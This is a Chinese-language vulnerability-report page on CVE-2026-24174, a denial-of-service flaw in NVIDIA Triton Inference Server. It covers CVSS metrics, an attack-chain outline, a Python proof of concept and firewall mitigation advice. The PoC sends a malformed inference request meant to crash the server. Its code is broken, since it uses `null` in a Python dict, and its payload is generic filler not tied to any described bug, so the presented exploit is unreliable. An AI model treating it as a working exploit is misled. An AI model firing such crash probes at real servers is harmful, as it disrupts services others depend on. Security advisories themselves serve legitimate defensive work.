IPBUF安全漏洞报告
English
CVE-2026-24174 CVSS 7.5 高危

CVE-2026-24174 NVIDIA Triton Inference Server 拒绝服务漏洞

披露日期: 2026-04-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-24174
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
NVIDIA Triton Inference Server

相关标签

拒绝服务DoSNVIDIATriton Inference Server无需认证远程攻击

漏洞概述

NVIDIA Triton Inference Server 在处理网络请求时存在安全漏洞。由于系统未能正确验证特定格式的输入数据,未经身份认证的远程攻击者可利用此缺陷向服务器发送恶意构造的畸形请求。一旦攻击成功,将导致服务器进程崩溃,进而引发拒绝服务,严重破坏系统的可用性和业务连续性。

技术细节

该漏洞的根源在于 NVIDIA Triton Inference Server 在处理客户端提交的推理请求时,缺乏对特定格式数据的严格校验机制。根据 CVSS 向量分析,该漏洞属于网络攻击(AV:N),攻击复杂度低(AC:L),且无需任何权限认证(PR:N)。攻击者可以通过网络向服务器开放的推理服务端口(通常为 HTTP 8000 或 gRPC 8001)发送特制的畸形数据包。这种畸形数据可能包括不符合协议规范的头部信息、异常的 JSON 结构或畸形的 Protobuf 消息。当服务器解析引擎尝试处理这些异常数据时,未能捕获由此触发的底层异常,导致服务进程直接崩溃。由于不需要用户交互,攻击者可利用自动化脚本批量扫描并利用该漏洞,造成大规模的服务拒绝,严重影响 AI 推理业务的连续性。虽然漏洞主要影响可用性(A:H),但在某些高可用性集群环境中,级联崩溃可能导致更严重的业务中断。

攻击链分析

STEP 1
侦察
攻击者扫描网络,寻找暴露的 NVIDIA Triton Inference Server 实例(通常在 8000 或 8001 端口)。
STEP 2
武器化
攻击者构造特制的畸形网络请求包,该请求包含能够触发服务器解析错误的恶意数据结构。
STEP 3
交付
攻击者通过互联网直接向目标服务器发送该恶意请求,无需任何身份认证。
STEP 4
利用
服务器在处理畸形请求时触发未捕获的异常,导致服务进程崩溃,服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for NVIDIA Triton Inference Server # Default ports are usually 8000 (HTTP) or 8001 (gRPC) target_url = "http://localhost:8000/v2/models/unknown/infer" # Malformed payload to trigger the crash # This payload simulates a broken request structure that may trigger unhandled exceptions malformed_payload = { "inputs": [ { "name": "test_input", "shape": [1, 224, 224, 3], "datatype": "FP32", # Intentionally malformed content to bypass validation or trigger parsing errors "data": ["TRIGGER_CRASH"] * 1000 } ], # Adding invalid parameters "invalid_parameter": null } try: # Send POST request without authentication headers = {"Content-Type": "application/json"} response = requests.post(target_url, json=malformed_payload, headers=headers, timeout=5) print(f"Status Code: {response.status_code}") print("Server may have crashed if no response or connection error occurs.") except requests.exceptions.RequestException as e: # Connection errors often indicate the service has crashed (DoS) print(f"Request failed (potential DoS successful): {e}")

影响范围

NVIDIA Triton Inference Server (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施
建议用户立即限制对 Triton Inference Server 的网络访问,将其置于内网环境并配置严格的防火墙规则,仅允许经过验证的客户端 IP 地址连接。同时,应密切监控服务器日志,一旦发现异常崩溃或大量畸形请求,应及时排查并准备应用官方补丁。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表